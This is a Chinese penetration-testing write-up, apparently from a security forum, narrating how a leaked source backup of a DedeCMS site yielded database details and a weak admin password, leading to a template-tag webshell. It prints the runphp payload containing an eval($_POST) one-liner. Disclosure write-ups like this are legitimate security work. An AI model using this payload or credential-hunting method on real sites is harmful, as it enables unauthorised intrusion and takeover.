记一次从源码泄露到getshell
6right 渗透测试 6522浏览 · 2021-12-24 13:11

前言:

此次渗透中的所有修改已经复原,且漏洞已经提交至cnvd平台

源码泄露

在一个月黑风高的夜晚,闲来无事的我又开着脚本利用hunter进行互联网站点源码的扫描

在查看备份文件扫描结果时,看到了宝贝

二话不说,访问下载得到源码!

可以在注释信息处发现dedecms的痕迹

敏感信息泄露

获得源码的第一步当然是获取敏感信息

先尝试全局搜索(crtl+shift+f)关键词

key
pwd
passwd
password

1.数据库信息泄露

2.后台管理员密码泄露

md5解密尝试解密,居然是一个弱口令

有了账户密码后当然是要找到后台管理地址,那么有了源码后台管理地址还不是手到擒来?

后台RCE->getshell

源码中找到后台地址(居然改了个888)

用泄露的admin/admin888进入后台后,发现版本信息为dedecms PS1

历史漏洞

既然已经获得了cms信息,第一步当然看看他的历史漏洞

查找SP1历史漏洞都是远程代码包含漏洞,但是这个站点已经将关键文件install.php删除(源码中不存在)

抱着侥幸心里又去尝试访问l一下(说不定后来又加上了呢)确实不存在,只能继续查看其他功能点

然后也尝试测试了许多SP2的漏洞payload但均失败

继续测试其他点

继续查看发现系统设置->系统基本参数->其他选项中有模板引擎的禁用函数

但是明明没有模板引擎功能他为什么要禁用呢?

我带着这个疑问又重新翻看源码

果然又找到模板相关文件,(说明只是功能点被隐藏,文件依旧还在)

尝试访问,成功访问到并且能够正常执行

那么就好办了,根据dedecms模板规则,后台模板写入payload,访问即可执行PHP代码

{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}
//调用方式 [field:字段名/] 这里的关键是runphp='yes'
//php代码则是简单的一句话

然后去将其他选项中的禁用函数全部删除保存

因为注入到了index.htm

所以连接webshell 的 url为首页

http://xxxxx:9890/index.php

成功getshell

本来还应该通过源码泄露得到的数据库账户密码尝试连接数据库的,但这里删shell跑路太急了就忘记了测了

5 条评论
某人
表情
可输入 255
t*枫
2023-09-15 01:33 广东 0 回复

不好意思打扰博主了,我发现您写的文章都很不错,可以转载您主页里的文章到opensnn吗?我会在转载的文章下标记出处和作者。请博主放心,在还没有博主您的同意前我不会进行转载。


6right
2021-12-28 00:44 1 回复

@breakalc

那是织梦CMS的模板标签,类似于XML格式。所有的模板都含有定界符,默认情况下是{dede:}和{/dede:},“*”代表模板标记名称。

这里的{dede:field name='source'}{/dede:field}是正常构造标签, runphp='yes'是dedecms支持简单的PHP模板编程,通过指定属性值可以执行PHP代码,所以构造标签然后放入一句话执行。


6right
2021-12-28 00:37 1 回复

@b188****55119

那是我自己结合hunter写的一个简易脚本,py文件和扫描目录都放github上了 https://github.com/liangyueliangyue/backup_scan


breakalc
2021-12-27 15:57 0 回复
{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}

师傅,这一段外面的一层代码干嘛用的呢,还是说本来就是无效的


b188****55119
2021-12-27 01:02 0 回复

师傅,这个扫源码的工具用的那个?有地址么